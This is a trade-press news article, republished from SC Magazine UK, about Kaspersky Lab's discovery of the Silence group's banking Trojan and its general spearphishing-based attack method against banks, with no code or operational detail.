Russian hackers silently threaten global financial organisations

By
Russian hackers silently threaten global financial organisations

A new bankrobber Trojan has been identified by researchers at Kaspersky Lab, quietly stealing money direct from the banks themselves rather than targeting customers.

A new bankrobber Trojan has been identified by researchers at Kaspersky Lab, quietly stealing money direct from the banks themselves rather than targeting customers.

The advanced persistent threat is ongoing, and the work of a Russian-speaking newcomers to the scene called the Silence group. The Silence Trojan itself is similar in many ways to the now infamous Carbanak threat that relieved banks of more than a billion dollars between 2013 and 2015. The similarity is not just in the ties to Russia, but also in the attack methodology applied.

According to Kaspersky Lab Silence looks to gain persistent access to internal banking networks over a lengthy period of time, during which day to day activity on the network can be monitored. The precise nature of each separate bank network infected is explored and the Trojan waits for the optimal moment to attack using the intelligence gained.

This intelligence is sourced by such methods as taking multiple screen shots of  active screens in order to produce a real-time video stream of internal banking network activity. 

The initial compromise is by way of a targeted spearphishing campaign, which uses infected documents. The documents themselves are fairly sophisticated however, both in appearance and execution; one click initiates a download chain ending in the execution of the dropper to connect to the C&C servers. Finally, malicious payloads are then downloaded and executed for each specific task such as screen-recording and credential theft.

All of which sounds like we've been here before, not just with Carbanak but a myriad other malware threats. Even the fact that Silence exploits the infrastructure of already infected financial institutions to launch new attacks using compromised bank employee email accounts is old hat as far as threat activity is concerned.

Which begs the question why have multiple financial organisations fallen victim to the Silence group? Kaspersky researchers suggest "at least 10" across multiple regions have been hit so far, and the attacks are ongoing. 

Sergey Lozhkin, security expert at Kaspersky Lab, says that "the most worrying thing here is that due to their in-the-shadow approach, these attacks may succeed regardless of the peculiarities of each bank's security architecture."  

This article originally appeared at scmagazineuk.com

Copyright © SC Magazine, UK edition
Tags:

Most Read Articles

Head2Head: Apple iPhone X vs Samsung Galaxy S8

Head2Head: Apple iPhone X vs Samsung Galaxy S8

The ACCC investigation into the NBN will be useful...

The ACCC investigation into the NBN will be useful...

Review: HP Spectre x2 (2017)

Review: HP Spectre x2 (2017)

How to: Delete your Google history

How to: Delete your Google history

Would you like to receive

Our Newsletter?